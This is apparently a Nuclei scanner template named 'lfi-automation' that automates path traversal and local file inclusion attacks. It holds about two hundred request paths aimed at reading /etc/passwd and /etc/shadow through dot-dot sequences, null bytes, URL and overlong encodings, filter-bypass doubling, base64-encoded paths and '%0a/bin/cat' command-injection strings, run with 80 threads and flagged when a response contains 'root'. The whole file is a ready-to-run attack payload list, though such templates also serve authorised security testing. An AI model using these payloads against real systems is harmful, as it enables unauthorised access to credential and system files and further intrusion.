id: lfi-automation

info:
  name: LFI
  author: rix4uni
  severity: Medium
  reference:
    - https://hackerone.com/reports/1419213
  metadata:
    verified: true
  tags: lfi,tech

requests:
  - method: GET
    path:
      - '{{BaseURL}}/etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../etc/passwd'
      - '{{BaseURL}}../../../../etc/passwd'
      - '{{BaseURL}}../../../etc/passwd'
      - '{{BaseURL}}../../etc/passwd'
      - '{{BaseURL}}../etc/passwd'
      - '{{BaseURL}}..\..\..\..\..\..\..\..\..\..\etc\passwd'
      - '{{BaseURL}}.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
      - '{{BaseURL}}\..\..\..\..\..\..\..\..\..\..\etc\passwd'
      - '{{BaseURL}}etc/passwd'
      - '{{BaseURL}}/etc/passwd%00'
      - '{{BaseURL}}/e?c/pa??wd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../etc/passwd%00'
      - '{{BaseURL}}../../../etc/passwd%00'
      - '{{BaseURL}}../../etc/passwd%00'
      - '{{BaseURL}}../etc/passwd%00'
      - '{{BaseURL}}%00../../../../../../etc/passwd'
      - '{{BaseURL}}%00/etc/passwd%00'
      - '{{BaseURL}}%00../../../../../../etc/shadow'
      - '{{BaseURL}}%00/etc/shadow%00'
      - '{{BaseURL}}%0a/bin/cat%20/etc/passwd'
      - '{{BaseURL}}%0a/bin/cat%20/etc/shadow'
      - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
      - '{{BaseURL}}..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd'
      - '{{BaseURL}}..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed'
      - '{{BaseURL}}..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd'
      - '{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
      - '{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
      - '{{BaseURL}}/./././././././././././etc/passwd'
      - '{{BaseURL}}/../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}/../../../../../../../../../../etc/passwd^^'
      - '{{BaseURL}}/..\../..\../..\../..\../..\../..\../etc/passwd'
      - '{{BaseURL}}..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
      - '{{BaseURL}}\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
      - '{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.html'
      - '{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.jpg'
      - '{{BaseURL}}../../../../../../etc/passwd&=%3C%3C%3C%3C'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/....\/etc/passwd'
      - '{{BaseURL}}....\/....\/etc/passwd'
      - '{{BaseURL}}....\/etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//....//etc/passwd'
      - '{{BaseURL}}....//....//etc/passwd'
      - '{{BaseURL}}....//etc/passwd'
      - '{{BaseURL}}passwd'
      - '{{BaseURL}}/.passwd'
      - '{{BaseURL}}.passwd'
      - '{{BaseURL}}../.passwd'
      - '{{BaseURL}}passwd.dat'
      - '{{BaseURL}}..2fetc2fpasswd'
      - '{{BaseURL}}..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00'
      - '{{BaseURL}}..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00'
      - '{{BaseURL}}L2V0Yy9tYXN0ZXIucGFzc3dk'
      - '{{BaseURL}}L21hc3Rlci5wYXNzd2Q='
      - '{{BaseURL}}ZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}ZXRjL3NoYWRvdyUwMA=='
      - '{{BaseURL}}L2V0Yy9wYXNzd2Q='
      - '{{BaseURL}}L2V0Yy9wYXNzd2QlMDA='
      - '{{BaseURL}}Li4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=='
      - '{{BaseURL}}Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA=='
    threads: 80

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'root'
